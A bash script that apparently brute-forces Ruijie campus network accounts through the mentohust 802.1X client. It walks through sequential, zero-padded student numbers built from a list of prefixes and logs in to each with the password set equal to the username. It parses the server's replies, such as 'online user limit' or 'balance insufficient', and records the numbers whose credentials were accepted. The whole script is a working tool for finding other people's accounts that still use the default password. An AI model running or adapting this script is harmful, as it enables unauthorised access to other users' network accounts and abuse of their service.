#!/bin/bash
number=
#连接产生的记录文件
tempfile=mentemp.tmp
logfile=menlog.log
#结果保存的文件
RESULT=result.re
RESULTx=resultx.re

#max number
MAX_NUMBER=350

#检查多少个账号不存在后跳过这个单位
BREAK_NUMBER=5

#stunum3=bgsxxy
stunum4=200
cheakstemp=0

#test
ok=0

function connect() {
	sudo mentohust -u$number -p$number -l1 -b0 -t$DELAY > $tempfile
	#sleep $DELAY
	sudo mentohust -k >/dev/null 2>&1
	echo `date` >> $logfile
	echo "sudo mentohust -u$number -p$number -l1 -b0 -t$DELAY" >> $logfile
	cat $tempfile >> $logfile
	#sleep 8
	#sudo mentohust -k >/dev/null
	info=`grep "提示" $tempfile | tail -1`
	echo $info
}

function get_result() {
	echo $info | grep "在线用户数量上限" 
	if [ $? -eq 0 ] ;then
	echo $number >>$RESULT
	fi
	echo $info | grep "不允许抢占" 
	if [ $? -eq 0 ] ;then
	echo $number >>$RESULT
	fi
	echo $info | grep "接入方式" 
	if [ $? -eq 0 ] ;then
	echo $number >>$RESULTx
	#sudo mentohust -k
        fi
	echo $info | grep "余额已不足" 
	if [ $? -eq 0 ] ;then
	echo $number >>$RESULT
	#sudo mentohust -k
        fi
	echo $info | grep "您当前使用的服务" 
	if [ $? -eq 0 ] ;then
	echo $number >>$RESULTx
	#sudo mentohust -k
        fi
	echo $info | grep "用户不存在" 
	if [ $? -eq 0 ] ;then
		none_number=`expr $none_number + 1`
	else
		none_number=0
	#sudo mentohust -k
        fi	
}

function addZero() {
	if [ $stunum4 -le 9 ] ; then
		stunum4="00"$stunum4
		else
			if [ $stunum4 -le 99 ] ; then
				stunum4="0"$stunum4
			fi
	fi
	
	echo $stunum4
}

function main() {
	> $tempfile
	> $logfile
	i=1
	sudo mentohust -k >/dev/null 2>&1
	#cat $1
	for stunum3 in `cat $1`
	do
		none_number=0
		while [ $stunum4 -le $MAX_NUMBER ]
		if [ $none_number -ge $BREAK_NUMBER ] ; then
			break;
		fi
		do
			number=${stunum3}`addZero`
			echo $number	
			info=`connect` 
			get_result

			i=`expr $stunum4 + 1`
			stunum4=$i
		done		
		stunum4=1
	done
}

main $1
exit 0
